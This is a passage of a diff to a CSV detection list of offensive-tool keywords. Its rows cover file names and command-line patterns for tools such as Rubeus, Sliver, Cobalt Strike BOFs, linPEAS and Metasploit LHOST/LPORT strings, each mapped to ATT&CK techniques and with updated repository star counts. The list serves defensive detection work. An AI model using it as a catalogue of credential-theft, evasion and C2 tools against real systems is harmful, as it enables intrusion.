"*ldeep_dump_users_enabled.json","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","N/A","3","219","26","2023-10-02T20:36:02Z","2018-10-22T18:21:44Z" "*ldeep_dump_users_enabled.lst","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","N/A","3","219","26","2023-10-02T20:36:02Z","2018-10-22T18:21:44Z" -"*ldeep_enum*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*ldif2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*leaky/leakbuf.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*ldeep_enum*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*ldif2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*leaky/leakbuf.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*leapsecurity*","offensive_tool_keyword","Github Username","github repo name hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/leapsecurity","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*legalhackers.com/exploits/CVE*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" -"*lem0nSec/ShellGhost*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","892","102","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" +"*lem0nSec/ShellGhost*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","899","103","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" "*lengjibo/FourEye*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" "*Leo4j/Invoke-SMBRemoting*","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","1","N/A","9","1","22","4","2023-10-02T10:21:34Z","2023-09-06T16:00:47Z" "*LetMeOutSharp.*","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/AggressiveProxy","1","1","N/A","10","10","139","26","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z" "*LFI scanner checks.jar*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","0","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*lgandx/Pcredz*","offensive_tool_keyword","Pcredz","This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. etc from a pcap file or from a live interface.","T1116 - T1003 - T1002 - T1001 - T1005 - T1552","TA0003 - TA0002 - TA0011","N/A","N/A","Credential Access","https://github.com/lgandx/Pcredz","1","1","N/A","N/A","10","1771","383","2022-11-07T14:15:02Z","2014-04-07T02:03:33Z" "*LHOST=* LPORT=*","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1043 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*liamg/traitor*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6213","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*liamg/traitor*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" "*lib/Bruteforcer.cs*","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","1","N/A","8","5","402","52","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" -"*lib/ForgeTicket.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"*lib/S4U.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*lib/ForgeTicket.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*lib/S4U.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "*LibcRealpathBufferUnderflow/RationalLove.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" -"*libFuzzer-HOWTO.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*libFuzzer-HOWTO.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*libnfc_crypto1_crack a0a1a2a3a4a5 0 A 4 B*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*libnspr_nspr_log_file_priv_esc.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*libreoffice2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*libnspr_nspr_log_file_priv_esc.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*libreoffice2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*libs/bofalloc*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","1","N/A","10","10","189","22","2023-03-03T22:53:02Z","2022-02-28T23:46:00Z" "*libs/bofentry*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","1","N/A","10","10","189","22","2023-03-03T22:53:02Z","2022-02-28T23:46:00Z" "*libs/bofhelper*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","0","N/A","10","10","189","22","2023-03-03T22:53:02Z","2022-02-28T23:46:00Z" "*LibSnaffle.ActiveDirectory*","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","N/A","AD Enumeration","https://github.com/Group3r/Group3r","1","1","N/A","N/A","5","488","47","2023-08-07T16:45:14Z","2021-07-05T05:05:42Z" "*LibSnaffle.FileDiscovery*","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","N/A","AD Enumeration","https://github.com/Group3r/Group3r","1","0","N/A","N/A","5","488","47","2023-08-07T16:45:14Z","2021-07-05T05:05:42Z" "*libSSH-Authentication-Bypass*","offensive_tool_keyword","POC","LibSSH Authentication bypass CVE-2018-10933 exploitation tool","T1210 - T1573 - T1553 - T1003 - T1059","TA0006 - TA0011 - TA0008","N/A","N/A","Exploitation tools","https://github.com/nikhil1232/LibSSH-Authentication-Bypass","1","0","N/A","N/A","1","6","2","2018-12-19T15:46:37Z","2018-12-19T15:33:00Z" -"*libxpc_mitm_ssudo.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*libxpc_mitm_ssudo.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*libxselinux.old*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*libxselinux.so*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*lightsout.py*","offensive_tool_keyword","LightsOut","Generate an obfuscated DLL that will disable AMSI & ETW","T1027.003 - T1059.001 - T1082","TA0005 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/icyguider/LightsOut","1","1","N/A","N/A","3","243","29","2023-06-09T10:39:36Z","2023-06-01T14:57:44Z" @@ -13105,43 +13262,43 @@ "*ligolo_windows*.exe*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*ligolo-master*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*ligolo-ng -selfcert*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*LinEnum.sh*","offensive_tool_keyword","LinEnum","Scripted Local Linux Enumeration & Privilege Escalation Checks","T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018","TA0007 - TA0009 - TA0002 - TA0003 - TA0001","N/A","N/A","Privilege Escalation","https://github.com/rebootuser/LinEnum","1","1","N/A","N/A","10","6220","1947","2023-09-06T18:02:29Z","2013-08-20T06:26:58Z" -"*LinEnum-master.ip*","offensive_tool_keyword","LinEnum","Scripted Local Linux Enumeration & Privilege Escalation Checks","T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018","TA0007 - TA0009 - TA0002 - TA0003 - TA0001","N/A","N/A","Privilege Escalation","https://github.com/rebootuser/LinEnum","1","1","N/A","N/A","10","6220","1947","2023-09-06T18:02:29Z","2013-08-20T06:26:58Z" +"*LinEnum.sh*","offensive_tool_keyword","LinEnum","Scripted Local Linux Enumeration & Privilege Escalation Checks","T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018","TA0007 - TA0009 - TA0002 - TA0003 - TA0001","N/A","N/A","Privilege Escalation","https://github.com/rebootuser/LinEnum","1","1","N/A","N/A","10","6219","1947","2023-09-06T18:02:29Z","2013-08-20T06:26:58Z" +"*LinEnum-master.ip*","offensive_tool_keyword","LinEnum","Scripted Local Linux Enumeration & Privilege Escalation Checks","T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018","TA0007 - TA0009 - TA0002 - TA0003 - TA0001","N/A","N/A","Privilege Escalation","https://github.com/rebootuser/LinEnum","1","1","N/A","N/A","10","6219","1947","2023-09-06T18:02:29Z","2013-08-20T06:26:58Z" "*link_tcp 127.0.0.1 *","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","0","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" "*linkedin2username.py -u*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*LinkedInt*","offensive_tool_keyword","LinkedInt","LinkedInt: A LinkedIn scraper for reconnaissance during adversary simulation","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Information Gathering","https://github.com/mdsecactivebreach/LinkedInt","1","0","N/A","N/A","5","463","112","2023-05-23T23:34:22Z","2017-07-12T12:58:47Z" -"*linpeas_builder.py*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z" +"*linpeas_builder.py*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" "*linpeas_darwin_amd64*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 